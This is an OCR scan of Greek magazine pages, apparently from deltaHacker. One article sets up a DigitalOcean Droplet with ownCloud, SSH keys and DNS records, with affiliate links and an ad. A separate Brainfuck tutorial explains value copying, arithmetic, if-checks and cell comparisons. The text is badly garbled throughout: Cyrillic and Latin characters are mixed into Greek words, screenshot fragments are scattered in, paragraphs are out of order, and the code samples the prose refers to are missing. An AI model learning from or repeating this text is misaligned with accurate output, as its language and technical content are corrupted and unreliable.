την εγκατάσταση και ρύθμιση του ownCloud, αφού χάρη oro τελευταίο εἶναι 
πολύ εὐκολο να μοιράζουμε αρχεία και φακέλους στους συνδρομητές 

τη δωρεάν απὀκτηση ενὸς ἐγκυρου -ὀχι self-signed- πιστοποιητικού, WOTE OI 
συνδρομητές να λαμβάνουν το περιεχόμενο апо ἐναν server που μπορούν να 
εμπιστεύονται 


Πιστεύουμε бт! κάποια -av όχι ὁλα- апо τα προηγούμενα θα τα βρείτε χρήσιμα και 
για τα бїка σας projects. Μην αποθαρρυνθεἰτε αν κἄποιοι Оро! ἠ/και έννοιες σας ei- 
ναι άγνωστα ἡ παράξενα. Ta Droplets της DigitalOcean εἶναι φθηνά, οπότε ξεκινήστε 
να πειραµατἰζεστε µε Eva μικρὸ και σύντομα θα μπορείτε να ψαρώνετε τους εξπἐρ 
- ἡ τουλάχιστον θα εἰστε σε θἐση να προσπαθεἰτε :) 
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Available Settings 


Private Networking 


Select Image 


Applications 


qp RubyonRalls on 14.04 
(Nginx * Unicorn) 


LAMP 0n 14.04 

@ Magento 1.91.0 on 14.04 

Ц FreeBSD AMP on 101 
пойе-у012.0 on 14.04 
MongoDB 2.67 on 14.04 


Zi Ghost 0.5.9 on 14.04 


Enable Backups 


Wf WordPress on 14.04 


@ MEAN on 14.04 


ELK Logging Stack on 
Wie 


Ж) MediaWiki 1.24.0 оп 14.04 


W GitLab 781 CE on 14.04 


Enable User Data 


Θ LEMP 0n 14.04 


@ Drupal 734 on 14.04 


dj Djengoon14.04 


©) Drone on 14.04 


Š Docker 15.0 on 14.04 


© Dokku v0.315 on 14.04 


#\ Redmine on 14.04 
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`e PHPMyAdmin on 14.04 


Δημιουργία Droplet, SSH keys και DNS 


Αν δεν ἐχετε λογαριασμό στη Digital Ocean, тора εἶναι η στιγµἠ να φτιάξετε vav. 
Μεταβεἰτε στο https://www.digitalocean.com ἡ πηγαίνετε µέσω του δικού µας affiliate 
link: 


http://bit.ly/digoceani0off 


Προσοχἠ: Ακολουθώντας то http://bit.ly/digoceani0off θα βρεθεἰτε kavo- 
мка στην πρώτη σελίδα της DigitalOcean, κι αν συνεχίσετε και φτιάξετε Eva 
Droplet τότε αυτομάτως θα ἐχετε 10 δολάρια ἑκπτωση. Έτσι, επιλἐγοντας 
το πιο μικρὸ μέγεθος Droplet (512MB RAM, 1 CPU, 20GB SSD disk και 1TB 
transfer), ουσιαστικά yia δύο μήνες θα το χρησιμοποιείτε εντελὠς δωρεὰν. 
Μετά τους δύο πρώτους µήνες, η χρέωση θα εἶναι 5 δολάρια avd μήνα. Σε 
περίπτωση που πειραματίζεστε στο πλαίσιο κἀποιου project ἡ апла θέλετε να 
πάρετε µια αἰσθηση апо τη DigitalOcean, προτείνουμε να ξεκινήσετε µε TO pi- 
кро Droplet. Έχετε ἄλλωστε υπόψη бт! ауа πάσα στιγµἠ παρέχεται δυνατότη- 
τα αναβάθµισης rov Droplets (λειτουργία Resize), evo βεβαίως επιτρέπεται va 
διαθέτετε και περισσότερα апо Eva Droplets. Όλα εξαρτώνται апо το τι θέλετε 
να πετύχετε κι εσεἰς σίγουρα γνωρίζετε καλύτερα απὀ πού Өа ξεκινήσετε και 
πώς θα συνεχίσετε. 


Εμεἰς πάντως ξεκινάμε ano Eva κάπως μεγαλύτερο Droplet, yia την ακρίβεια ano 
αυτὸ µε 2GB RAM, 2 CPUs, 40GB SSD disk και 3TB transfer (δωρεάν, ауа μήνα). 
Ката τη δημιουργία Droplet εἶναι υποχρεωτικὀ va πληκτρολογήσουμε Eva ὀνομα 
(hostname). Θα επιλέξουμε και τη γεωγραφικἠ περιοχἠ (Region) του datacenter, στο 
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Add SSH Keys (Optional) 


Add SSH Key Close 


Esh-rsa 
AAAAB3NzaCiyc2EAAAABJQAAAgEA6OsJOLh7g3IhsCgmEiokRWmOu*AZvrUZusfimS24BEiR9L 
vB-KIHCptAMDQVXiQLWETNdEsIZz9016m9EiwYM/94MbXfz65MBD 
/CiHI3ZaNMNI-*M6TinQnAzx9gFD1F2Xpvof26g4EboZF3K8FeEZDx8LUqr4nFLifqP-*3ERaJnd 
NjTI6HTfmZmbQpuvVKSx58CNFOdUdKU3RsgD-*QAYXeL40TNaAu76vL9cYaYqJ5R 
/F3gSEPdnrj2rPHIWF2YXZOwwv*ÜAMBD63AGshiWDZvyCnT4jGb8JCSUywifAUidl91B3KzVOE 


mxP2i Z*V-ENyO-WrKzCVYd4XXcpdiw8bKKMgVnvGHQCmMO8 20MJ4KinmTGp5wo9Bu3MCva2uWA 

WwNq6EZhYRwjp2UwHq03np4r7HYa3i6*e/zN5TB8a4Uoi*llPUGAxtEj4jRQiX34Djb9P*Zcr 
/ODqiCjNmkI8zA8bEJtmSUis2tgdcMduXtBDzJJÜ0fwGVxo6004QeAANPWXFVGG-*ySqr7lsN6Ot 
ionVO0ycWz64zzycXiPiFJvhwpaWXasx 
/CScS7GHjaqUStbYqaLHqSzSJKj3zhBfjQ6LnvzhrycdKcejiGm2AFSA6ZwvL57FikYghrWuBy 
neEWmyEImBEju3hipZou6xxkBRalsC2dXwMkdnMaEF5zslmRTDk- rsa-key-20141028 
[Generated on Core i3 PCI 


Created on Core i3 PC [Windows 7, PuTTY Key Generator] Add SSH Key 


Adding an SSH key is a recommended security measure. If you choose not to add one, you will receive a root 
password via email 


Create Droplet 


Λίγο πριν δημιουργήσουμε ro Droplet µας, aveBácouue ro δημόσιο κλειδί 
ενός ζεύγους κλειδιών που φτιάξαμε σε Eva Windows PC µε ro PUTTY Key 
Generator. To δημόσιο κλειδί θα πάει στο αρχείο .ssh/authorized hosts Tou 
χρήστη root. Ano το ἰδιο PC θα εἰμαστε σε θέση να συνδεόµαστε µε ασφάλεια 
στο λογαριασμό του, µε τη βοήθεια rou PuTTY και χωρίς να πληκτρολογούμε 
password. 


οποίο θα Φιλοξενείται ro Droplet. Па £vav server nou εξυπηρετεἰ πελάτες σχεδὀν 
αποκλειστικἀ ano Ευρώπη, το Ἀμστερνταμ εἶναι ша калд επιλογἠ. (О Aviwidc του 
Θείου Ακάκιου μάλλον θα προτιμούσε το Λονδίνο, αλλά προς то παρὀν μπορούμε να 
TOV αγνοήσουμε.) 


Тора, για την επιλογἠ του λειτουργικού συστήματος που θα τρέχει TO Droplet, στη 
σελἰδα δημιουργίας nnyaivouus λἰγο πιο като, στην περιοχἠ Select Image. Παρατη- 
priore ὁτι апо την καρτέλα Distributions παρέχεται Eva πλήθος "σκέτων" διανομών 
Linux (και το FreeBSD). Ουσιαστικά, επιλἐγοντας Eva r£roio image To Droplet µας 
θα ξεκινήσει µε ro αντἰστοιχο λειτουργικὀ σύστημα *xopic* ἐξτρα εφαρμογέὲς και 
software stacks, ὁπως, n.x., εἶναι το Drupal, To ownCloud, το LAMP к.а. Προφανώς, 
ὁ,τι £&rpa λογισμικό χρειαστούμε θα ro εγκαταστήσουµε και ρυθµίσουµε αργότερα, 
μόνοι µας. Εναλλακτικά, αν έχουμε αποφασίσει εκ των προτέρων για το ρόλο του 
Droplet και τώρα θέλουμε να κερδίσουμε αρκετὀ χρόνο, μπορούμε να πάμε στην 
καρτέλα Applications και να κοιτάξουμε για капою image nou non περιλαμβάνει 
TO βασικὀ λογισμικὀ που χρειαζόμαστε. Εμείς, για παράδειγµα, διαλἐξαµε auró то 
"ownCloud 8.0 on 14.04": Όπως υποδηλώνει τ' ὀνομά του, πρὀκειται για ἑνα Ubuntu 
Server 14.04 LTS image най! µε то ownCloud 8.0 (σε LAMP stack). 
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As | 


—_ 


Create Droplet 


Droplets 


@ 162.243.8713 x 


WWW 162.243.8713 x 
Images 
icebox 461491810 x 
SSH Keys 
Billing eyjafjallajokull 12819947117 x 
Support 
mail ghs.googlehosted.com. x 
DNS 


Apps & API docs ghs.googlehosted.com. x 


calendar ghs.googlehosted.com. x 
= Settings 
© Logout 1 aspmx|.google.com. κ 
5 alt.aspmx|.google.com. κ 


5 alt2.aspmxi.google.com. x 


10 aspmx2.googlemail.com. κ 


10 aspmx3.googlemail.com. κ 
ΤΧΤ 8 ν-ορῇ include: spfgoogle.com “all” x 


nsidigitalocean.com. x 


Στον DNS manager της DigitalOcean εἶχαμε ήδη ορίσει Eva zone yia то 
parabing.com. Του προσθέσαµε éva ακόµα A-record yia To subdomain ονόματι 
eyjafjallajokull, το οποίο αντιστοιχεί στο νέο µας file host για τους συνδρομη- 
τές του deltaHacker. 


Λίγο πριν δημιουργήσουμε το Droplet, αξίζει να σταθούμε Ліүо για να πάρουμε ша 
πρώτη σηµαντικἠ απὀφαση που αφορά στην ασφάλεια. Κάθε Droplet διαθέτει το 
λογαριασμὀ του διαχειριστή συστήματος (root) κι εμεἰς, ως κάτοχοι rou Droplet, 
έχουµε πλήρη πρόσβαση σ' αυτόν. Μετά την ενεργοποίηση του Droplet, καλὸ εἶναι 
να φτιάξουμε το συντομότερο δυνατὸν Eva λογαριασμὸ απλού χρήστη, στον onoio 
θα συνδεόµαστε στο εξἠς kai θ' αποκτάµε δικαιώματα διαχειριστή προσωρινἁ, N.X., 
μέσω του sudo, μόνον για τις εργασίες που τα απαιτούν. Αλλά το θέμα µας εδώ εἶναι 
алло. Mac θα συνδεθούμε την πρώτη фора στο Droplet; Πα κάθε Eva, η DigitalOcean 
παρέχει Console Access µέσω rou web browser: Апо το panel διαχείρισης επιλέγου- 
µε το Droplet και δίνουμε Access ^ Console Access. Δημιουργείται τότε µια ασφαλἠς 
σύνδεση VNC και στον web browser ἐχουμε µια ωραιότατη κονσόλα, στην οποία 
βλέπουμε ό,τι θα βλέπαμε αν το VPS ἦταν φυσικὀ μηχάνημα µε οθόνη και πληκτρο- 
λόγιο κι εμεὶς καθόμασταν μπροστὰ του. Αντἰ ὁμως yia πρὀσβαση µέσω κονσόλας, 
εἶναι *noAU* καλύτερα να συνδεθούμε µε тп βοήθεια ενὸς SSH client ὁπως, π.χ., £i- 
ναι το PUTTY στα Windows. Οὗτως ἡ ἄλλως, To Droplet µας Ва ἐχει ενεργοποιημένο 
τον OpenSSH server kal θα περιμένει για συνδέσεις. Το προηγούμενο ερὠτημὰ μας, 
λοιπὀν, τώρα αλλάζει: Ποιο εἶναι το password του χρήστη root; Н απάντηση εἶναι 
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ων Nameservers: (Етгёгруасіа) ә) Φάκελοι Ф: (Επεξεργασία 


ns1.digitalocean.com To όνοµα χώρου δεν υπάρχει σε 
ns2 digitalocean.com κάποιο φάκελο 
ns3.digitalocean.com 


ων Domain Forward Ф: w Control Panel Lite: 


Ανενεργό (Ενεργοποίηση Ανενεργό (Ενεργοποίηση 
Δώστε πρόσβαση σε τρίτους, για 
το συγκεκριµένο όνοµα χώρου. 


ων Κωδικός Εξουσιοδότησης ©: ә) Αυτόματη Ανανέωση ©: 
Αποστολή µέσω етай Ενεργό (Επεξεργασία) 


Н υπηρεσία Αυτόματης Ανανέωσης. 
Κατάσταση: Ενεργό θα εφαρμοστεί και στην 


συνδεδεμένη υπηρεσία ID Protect 
ον MEM για το επιλεγμένο Domain Name. 


Ημερομηνία Λήξης: 
Нер стс ЕШШ 


ә) Σελίδα Υπο Κατασκευή ή Προς Πώληση ©: 
Ανενεργό (Ενεργοποίηση 


Κατάσταση: Κλειδωμένο ων Πώληση Domain (Ὁ: 
Ανενεργό (Ενεργοποίηση 


Κατάσταση: Ενεργό ә) Υπηρεσία DNS Ф: (Eveoyoroinon) 


m >) Προβολή στο Facebook Ф: 
Md -... 
Ανανέωση Κατάσταση: Ανενεργό 
(Ενεργοποίηση: 


ἍἊ-υ-, 


απλή: Θα λάβουμε προσωρινὀ password µέσω email, αμέσως μετὰ τη δημιουργία 
του Droplet. Εννοείται ὁτι την πρώτη φορά nou θα συνδεθούμε -μέσω SSH ἡ апо 
την κονσόλα- θα αλλάξουμε το password µε το εργαλείο passwd. 


Υπάρχει κι £vac Χασφαλέστερος” τρόπος σύνδεσης, ο οποίος δεν απαιτεἰ καν nàn- 
κτρολόγηση password. Апо τη στιγμή που χρησιμοποιούμε то SSH, ro authentication 
εἶναι δυνατὸν να γίνεται µε τη βοήθεια κλειδιών. Θα ἐχουμε φροντίσει WOTE να δι- 
αθέτουµε (τουλάχιστον) Eva ζεύγος ιδιωτικού-δημοσίου κλειδιού, στον αποµακρυ- 
срёуо λογαριασμὀ χρήστη θα υπάρχει το δημόσιο κλειδὶ ενὸς τἐτοιου ζεύγους, onó- 
τε ως κάτοχοι του αντίστοιχου ιδιωτικού κλειδιού θα συνδεόµαστε µε ασφάλεια κι 
αμέσως, δηλαδή χωρίς την πληκτρολόγηση password. Το λεγόμενο password-less 
authentication εἶναι ασφαλέστερο апо το "κλασικό" - και ξέρουμε πολὺ кала πως 
ότι εἰπαμε δεν αποτελεἰ εξήγηση rou noc ακριβώς δουλεύει ο όλος μηχανισμός. 
Μια τἐτοια συζήτηση ξεφεύγει апо τους σκοποὺς του παρόντος, μπορείτε ὁμως να 
διαβάσετε το σχετικὀ άρθρο που φιλοξενούμε στο site του περιοδικού και συγκε- 
κριµένα στη διεύθυνση http://deltahacker. gr/?p=13357. Προς To παρὀν θα πούμε От! 
αν διαθέτετε NON Eva δημόσιο κλειδί, µπορείτε να το δώσετε (µε copy-paste) στην 
ενότητα Add SSH Keys, στο web panel της DigitalOcean. Αν το κάνετε, το κλειδί θα 
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προστεθεἰ στο αρχείο .ssh/authorized_keys rou root και, ως κάτοχος του avTİOTOI- 
хоо ιδιωτικού κλειδιού, θα συνδέεστε απομακρυσμένα και µε ασφάλεια στο λογα- 
ριασμὀ του root µέσω SSH και μάλιστα χωρίς να πληκτρολογεἰτε κἀποιο password. 
Μπορείτε βεβαίως να προσθέσετε περισσότερα апо Eva κλειδιά, για κάθε υπολογιστή 
ἠ/και λειτουργικό ano το οποίο θα θέλετε να συνδέεστε στο Droplet. Σε κάθε nepi- 
πτωση, οφείλουμε va υπογραμμίσουμµε Ori τα ιδιωτικἀ κλειδιά εἶναι δικἠ σας ευθύνη 
και προφανώς δεν πρέπει να πέσουν στα χέρια τρίτων. 


Μετά ano олп αυτἠ τη συζήτηση και την προετοιμασία, η δηµιουργία του Droplet 
γίνεται µε Eva κλικ στο μεγάλο κουμπὶ "Create Droplet". Па τη σύνδεση σε κἄποια 
υπηρεσία rou VPS αρκεἰ να γνωρίζουμε το δημόσιο IP του, το οποίο φαίνεται µε κλικ 
πάνω στο буора του Droplet, στο web panel της DigitalOcean. Υπόψη OT! αν έχετε 
κάποιο domain που θέλετε va αντιστοιχίσετε στο IP του Droplet, µπορείτε va το Kà- 
vete ano τον DNS manager που παρέχει η εταιρεία. (Αν πάλι δεν έχετε domain, ἴσως 
σας ενδιαφἑρει αυτὸ το αρθράκι: http://deltahacker.gr/?p-13053.) Μην ξεχάσετε να 
ενημερώσετε και τον registrar, ορἰζοντας τους name servers της DigitalOcean για 
TO domain (nsi.digitalocean.com, ns2.digitalocean.com και ns3.digitalocean.com). 
To υπογραμμµίζουμµε auró διότι για κἄποιον περἰεργο λὀγο ορισμένοι ξεχνούν TO συ- 
YKEKPIHEVO βήμα - και μετά αναρωτιούνται τι δεν πάει кала. Στη δικἠ µας περίπτωση 
εἰχαμε NON φροντίσει για τις ρυθμίσεις DNS rou parabing.com (το web site σερβἰρε- 
ται ano алло Eva Droplet), οπότε πήγαμε σ' αυτὲς και προσθέσαµε Eva vo A-record 
για то eyjafjallajokull. Έτσι, ro eyjafjallajokull.parabing.com αντιστοιχούσε πλέον 
στη δημόσια διεύθυνση IP του oAokaivoupyiou VPS. 


Н συνέχεια 


Στο άρθρο που αρχίζει апо τη σελίδα 46 κάνουµε την πρὠτη µας απομακρυσμένη 
σύνδεση, µέσω SSH, ото eyjafjallajokull.parabing.com. Ενημερώνουμε το λειτουρ- 
γικὀ, πραγματοποιούμε μερικὲς απαραίτητες ρυθμίσεις στο σύστημα κι ενισχύουμε 
опраутіка την ασφάλειά του. Πολλά апо боа θα δούμε EXE! νόημα να γίνονται Ἔσε 
κάθε” νέο VPS, WoTe NON апо την αρχἠ να αποκλείουμε Eva μεγάλο ποσοστὸ δυνη- 
τικῶν κινδύνων. 
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4 
DigitalOcean 


Ταχύτατα VPSes στο cloud, σε hosts µε δίσµους SSD. 
Επιθογή datacenter σε Ευρώπη, Αμεριμή μαι Ασία. 
Lean-mean control panel, yia απόῆυτο έβεγχο. 


Αποητήστε τώρα το δικό cas VPS, 

στο cloud της DigitalOcean. 

Κάντε KAIK στο http://bit.ly/digocean10off 
ка! κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το шкрб πϑάνο, 

πάντα µε KAIK στο http://bit.ly/digocean10off, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD και 1TB transfer. 


mH Δεν είναι кї ἄσχημα 
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by multiPetros 


To va εφευρίσκει κανείς τον τροχὸ, ξανὰ και ξανὰ, εἶναι τις περισσότερες φορὲς 
κουραστικὀ και αντιπαραγωγικὀ. Μερικές φορὲς ὅμως μπορεί να γίνει συναρπαστικὀ. 
Συνεχίζοντας τη μύηση στον κόσμο Brainfuck, θα προχωρήσουμε σ' ορισμένα πιο 
σύνθετα ζητήματα: Θα υλοποιήσουμε τους τελεστές και τις δομὲς ελέγχου που 
υπάρχουν σε ὀλες τις "MUGIOAOYIKEG" γλὠσσες προγραμματισμού. 


о ā = 
mS ә 


Brainfxck [µέρος 201 


“0 


Στο άρθρο που αρχίζει ano τη σελἰδα 26, για την υλοποίηση rou "Hello World!" χρη- 
σιμοποιήσαμε τις EVTOAEG μετακίνησης rou δεἰκτη. Παρά τη γενικἠ σύγχυση nou 
µπορεί να προκαλέσει η εκτεταμένη χρήση των συγκεκριμένων εντολὠν, η λειτουρ- 
yia τους γίνεται εὐκολα κατανοητή. Με λίγη προσοχἠ και άλλη τόση υπομονή, εἶναι 
EUKOAO να παρακολουθήσει κανεἰς τις μεταβολὲς του δείκτη kai, κατ' επέκταση, то 
nac τροποποιούνται τα δεδομένα της μνήμης. Тора που πήραμε µια πρώτη γεύση 
апо το χειρισμὀ του δείκτη, μπορούμε να εξετάσουμε πιο προχωρημένες τεχνικὲς. 
Μη φαντάζεστε τεχνικὲς σχεδίασης γραφικὠν και σχηματισμού σκιών. Μιλάμε για τις 
απλὲς πράξεις και τις βασικὲς δομὲς ελέγχου. Μην ξεχνάτε άλλωστε oT! η Brainfuck 
δεν πἠρε ruxaia το ὀνομὰ της. 


Αντιγραφή τιμών 


Прота απ' όλα θα δούμε NWG μπορούμε va αντιγράψουμε την τιµή ενὸς κελιού σε 
ἑνα алло. Χρησιμοποιώντας την κλασική ορολογἰα, θα δούμε пос μπορούμε va EK- 
χωρήσουμε την τιµή µιας μεταβλητής σε µια ἄλλη. Στην PHP, για παράδειγµα, θα 
OIVGHE кайт! τέτοιο: 


Πα να πετύχουμε κάτι τέτοιο στην Brainfuck πρέπει να χρησιμοποιήσουμε Eva Bon- 
θητικὀ κελί. Συνολικἀ δηλαδὴ θα χρειαστούμε τρία κελιά: Eva για κάθε μεταβλητἠ 
και το βοηθητικὀ. Ας υποθέσουμε бт! η τιµή που θἐλουµε να αντιγράψουµε βρίσκεται 
στο κελὶ 0 και ας δούμε τον κώδικα που δημιουργεἰ Eva αντίγραφο αυτής της τιμής: 


Αρχικἁ αντιγράψαμε την τιµή του κελιού 0 στα κελιά 2 και 3, алла την ἴδια στιγµή, 
μηδενἰσαμε To кєлї 0. Έτσι, ολοκληρώσαμε την αντιγραφή μεταφέροντας την τιµἠ 
του κελιού 2 στο кєлї 0. Όπως καταλαβαίνετε, το κελἰ 1 αποτέλεσε τον προορισμό 
της αντιγραφἠς, ενώ το кєлї 2 ἦταν το βοηθητικὀ. Αν απομακρύνουμε τα σχόλια, ο 
κώδικας της αντιγραφἠς παίρνει την ακόλουθη µορφή: 
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Αριθμητικὲς πράξεις 


Σε Eva οποιοδήποτε πρόγραμμα, EKTOG апо το να αποθηκεύουµε τιμὲς σε διάφορες 
μεταβλητές, θέλουμε να κάνουμε και πράξεις. Αυτὸς εἶναι ἄλλωστε και ο λὀγος για 
τον οποίο αποθηκεύουμε TIG τιμές. Ας ξεκινήσουμε µε την πρόσθεση, που στην PHP 
γίνεται µε τον εξἠς απλούστατο τρόπο: 


Στην Brainfuck, ὁπως υποψιάζεστε, αυτή η τόσο απλἠ πράξη апат! λίγο παραπάνω 
κόπο. Θα επιστρατεύσουμε και пал Eva βοηθητικὀ кєл! (το 2) και θα προσθέσουμε 
την τιμὴ του κελιού 1 σε αυτήν του κελιού 0. Απολαύστε τον κὠδικα: 


Δείτε τον κὠδικα χωρίς τα περιττά (!;) σχόλια: 


Όπως διαπιστώσατε, για να προσθέσουμε την τιµή του κελιού 1 σε αυτήν του κελιού 
0, υποχρεωθἠκαµε va μηδενίσουµε то кєлї 1. Ακριβώς ү auTO, фроутісар va αντι- 
γράψουμε την τιµή του στο βοηθητικὀ кєл! 2. Φυσικά, στο τέλος δεν παραλείψαμε 
va πραγµατοποιήσουµε και την αντίστροφη μεταφορὰ (апо то кєлї 2 στο кєл! 1). 


Н αφαίρεση υλοποιείται µε τον ἰδιο μηχανισμὀ. Αν υποθέσουμε бт! το кєлї 0 εἶναι ο 
αφαιρετἑος και το κελἰ 1 εἶναι o αφαιρέτης (keliO = keliO - keli1), επαναλαμβάνουμε 
τον κὠδικα που εἰδαμε προηγουμένως και σε κἆθε επανάληψη του πρώτου βρόχου, 
аут! va αυξάνουµε την τιµή του κελιού 0 τη μειώνουμε. Τον πολλαπλασιασμὀ τον 
έχουμε μελετήσει NON. Αναρωτιέστε note; Μα, órav παρουσιάσαµε то "Hello World!". 
Εν ολίγοις, ο πολλαπλασιασμὀς επιτυγχάνεται µε την επανάληψη των απαιτούμενων 
αυξήσεων. 
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Brainfuck Developer 1.4.7 Dj 


File Edit View Run Interpreter Extras Help Minimize 


Ы пе 8 Memory [а] 


Source Editor - U 


Unknown1 


11:4 Running Oips 13i 80,498 


Enter text: or a number: ы) 


To Лтд περιβάλλον rou "Brainfuck Developer" κατά- 
φερε να κερδίσει την карба µας, κυρίως χάρη στην 
αμεσότητα που προσφέρει. Το γεγονός От! δεν παράγει 
εκτελέσιμα δεν µας πτόησε καθόλου, OUTE μείωσε τη 
χαρά του παιχνιδιού µε τη Brainfuck. 


Ἐλεγχος αν... 


Εκτὸς ano τους βασικούς αριθμητικούὺς τελεστές, η Brainfuck στερεἰται και κάποιων 
μηχανισμών που δεν απουσιάζουν апо καμία ἄλλη γλὠσσα. Τι γίνεται, ας πούμε, µε 
τη δομή switch; Ας µην το χοντραΐνουµε ὁμως! Н Brainfuck δεν έχει OUTE καν τους 
απλούς ελέγχους IF. Тора ενδἐχεται να διαμαρτυρηθεῖτε - και δικαίως. Н αλήθεια 
εἶναι От! η εντολἠ έναρξης βρὀχου ([) πραγματοποιεί κάτι παραπλἠσιο µε αυτό που 
θέλουμε: Ελέγχει αν η τιµή του τρέχοντος κελιού εἶναι 0 ἡ ὀχι και eire συνεχίζει την 
εκτέλεση апо την επὀµενη γραμμὴ eire μεταπηδὰ στην αντίστοιχη δεξιά αγκύλη. О 
αντἰστοιχος κὠδικας σε PHP θα ἦταν κάπως ἐτσι: 
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Н παραπάνω борі μοιάζει κάπως µε τον ἐλεγχο IF, αλλά δεν πρέπει να ξεχνάμε бт! 
πρὀκειται για κάτι διαφορετικὀ: Па Eva βρὀχο επαναλήψεων. AUTO σημαίνει ὁτι то 
μπλοκ TOU κὠδικα ενδέχεται να εκτελεστεἰ παραπάνω апо uia φορὲς και OX! ακριβώς 
μία, όπως θα συνέβαινε µε ἑναν ἐλεγχο IF. Σκεφτείτε, λοιπόν, την περίπτωση nou 
θέλουμε να υλοποιήσουμε кайт! τέτοιο: 


Πα να πετύχουμε κάτι παρόμοιο στη Brainfuck θα χρειαστούμε Eva βοηθητικὀ κελί. 
Н тїнї αυτού του κελιού εἶναι αδιάφορη, αλλά πρέπει να θυμόμαστε Ori 0a κατα- 
στραφεἰ. Αν χρησιμοποιήσουμε το келі 1 σαν βοηθητικό, o κὠδικας για τον парапа- 
vw ἐλεγχο έχει ως EENG: 


Ti λέτε; Το καινούργιο κόλπο φαίνεται στην προτελευταἰα γραμμὴ του βρὀχου. Αφού 
μεταβούμε στο βοηθητικὀ κελἰ, ξεκινάμε Eva δεύτερο βρὀχο που περιλαμβάνει μόνο 
την EVTOAN μείωσης. О φωλιασμένος βρὀχος Ва τερµατιστεἰ ὁταν το τρέχον κελὶ 
µηδενιστεἰ. Αμέσως μετὰ, όμως, θα τερµατιστεἰ και ο εξωτερικὀς βρὀχος. Τελικά, 
η ακολουθἰα εντολών `[-]' λειτουργεί σαν τη γνωστή εντολἠ break. Me τη βοήθεια 
αυτού του χειροποίητου break, εξασφαλίζουµε бт! ο κὠδικας nou περικλεἰεται στο 
εξωτερικὀ ζεύγος αγκυλώὠν θα εκτελεστεὶ μόνο µια фора. 


Σύγκριση κελιών 


Πα την opa έχουμε μάθει να ελἐγχουµε αν Eva κελὶ έχει µηδενικἡ тїнї ἡ OXI. Αυτὸς 
ο ἐλεγχος εἶναι χρήσιμος, αλλά δεν аркі. Υπάρχει ἑνας εξίσου απλὀς έλεγχος, o 
οποίος παρουσιάζει ακόµα μεγαλύτερη χρησιμότητα. Πρόκειται για τη σύγκριση δύο 
τιμῶν και την εκτέλεση ενὸς τμήματος κὠδικα, ανάλογα µε το ποια τιμὴ εἰναι µεγα- 
λύτερη. Πριν παρουσιάσουμε την υλοποίηση των συγκρἰσεων прёп να εξετάσουμε 
µια φαινομενικὰ ἄσχετη τεχνική, η οποία όμως θα φανεί ιδιαιτερα χρήσιμη στη ou- 
νέχεια. Πρόκειται για ἑνα колпак! µε το οποίο εντοπἰζουμε το прото кєлї, eire προς 
τα "αριστερά" eire προς та "δεξιά", nou ἐχει μηδενική τιµή. О κὠδικας που πετυχαίνει 
TOV εντοπισμὀ εἶναι ιδιαίτερα απλὀς: 
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Όπως βλέπετε, για να βρούμε το πλησιέστερο μηδενικὀ кєлї χρησιμοποιούμε Evav 
шкро βρὀχο. Μέσα στο βρόχο πραγματοποιούµε μόνο τη μετακίνηση προς την eni- 
θυµητή κατεύθυνση. Ξέρουμε бт! αυτό το κὀλπο μοιάζει τόσο ενδιαφέρον, ὁσο και 
ἀχρηστο για το ζήτημα των συγκρἰσεων. Σε Alyo όμως θα διαπιστώσετε бт! εἶναι 
απολύτως anapairnro. 


Па να πετύχουμε τη σύγκριση δύο τιμών στη Brainfuck, χρειαζόμαστε ἐξι διαδοχικἁ 
κελιά. Στο прото πρέπει να βάλουμε την τιµή 0, στο δεύτερο την τιμή 1 και στο Tpi- 
το την τιμή 0. Στα επὀµενα δύο κελιὰ πρέπει να τοποθετήσουµε τους αριθμούς nou 
θέλουμε να συγκρίνουμε, ενώ στο ἐκτο πρέπει να δώσουμε και пал την τιµή μηδέν... 


Μετὰ την αποθήκευση των επιθυμητών τιμών, µεταβαίνουμε στο келі µε τον прото 
προς σύγκριση αριθμό και ξεκινάμε Eva βρὀχο. Μέσα στο βρόχο HEIMVOUHE ката ша 
μονάδα τους δύο αριθμούς και µεταβαίΐνουμε στο прото μηδενικὀ κελἰ προς та δε- 
са. Ακολούθως µεταβαίνουμε δύο кела προς ra πἰσω κι επαναλαμβάνουµμε ro βρὀχο 
HE τις μειώσεις. AVAPWTIEOTE σε TI ωφελούν αυτές οι μανούβρες; 


Αν о αριθμὸς στο кєлї 3 εἶναι μικρότερος апо rov αριθμὸ στο кєлї 4, θα μηδενιστεὶ 
πρὠτος. Συγκεκριµένα, σε κάποια ano τις επαναλήψεις του βρὀχου το кєлї 3 θα 
µηδενιστεί, ενώ το κελἰ 4 θα EXE! µη μηδενικἠ τιµή. Αμέσως μετὰ, αναζητώντας το 
прото μηδενικὀ κελὶ προς τα δεξιά, θα καταλήξουμε στο келі 5. Κι όταν στη συνὲ- 
Xela κάνουμε δύο βήματα πίσω (προς ra αριστερὰ), θα βρεθούμε στο кєлї 3. AUTO 
TO κελἰ όμως ἐχει μηδενιστεἰ κι ἐτσι ο βρόχος των μειώσεων θα τερματιστεί. Με λἰγα 
λόγια, αν o αριθμὸς στο κελί З εἶναι μικρότερος ο βρὀχος θα τερματιστεἰ, µε το δεί- 
KTN μνήμης va παραπέμπει στο кєлї 3. Ας εξετάσουμε тора και την ἄλλη περίπτωση. 
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Αν о αριθμὸς στο кєлї 3 εἶναι μεγαλύτερος апо τον αριθµὀ στο кєл! 4, σε κἄποια 
ano τις επαναλήψεις rou βρὀχου θα μηδενιστεἰ το κελἰ 4, EVW το κελἰ 3 θα EXE! µη 
μηδενικἠ τιμή. Στη συνέχεια, αναζητώντας то прото μηδενικὀ кєлї προς τα δεξιά 
και εφόσον το κελὶ στο οποίο βρισκόμαστε (κελἰ 4) EXE! NON µηδενιστείἰ, δεν θα 
μετακινηθούμε καθόλου! Έτσι, κάνοντας δύο βήματα πἰσω (προς τα αριστερὰ) θα 
καταλήξουμε στο кєлї 2. Αυτό το κελἰ, όμως, ἐχουμε φροντίσει εξαρχἠς να εἶναι 
μηδενισμένο. Ката συνέπεια, ο βρόχος των μειώσεων θα τερματιστεί. Τελικά, αν ο 
αριθμός στο кєлї 3 εἶναι μεγαλύτερος, ο βρόχος θα τερματιστεί µε το δείκτη μνήμης 
να παραπέἐμπει στο κελἰ 2. Το ἴδιο θα συμβεἰ και στην περίπτωση nou οι δύο αριθμοὶ 
εἶναι ἴσοι. 


Ωραία ὁλα αυτά, θα πεἰτε, αλλά σε τι ωφελούν; Η αλήθεια εἶναι ὁτι ο κὠδικας που 
εἰδαμε δεν εἶναι ολοκληρωμένος. Στις παραπάνω γραμμὲς κὠδικα, прёп να npo- 
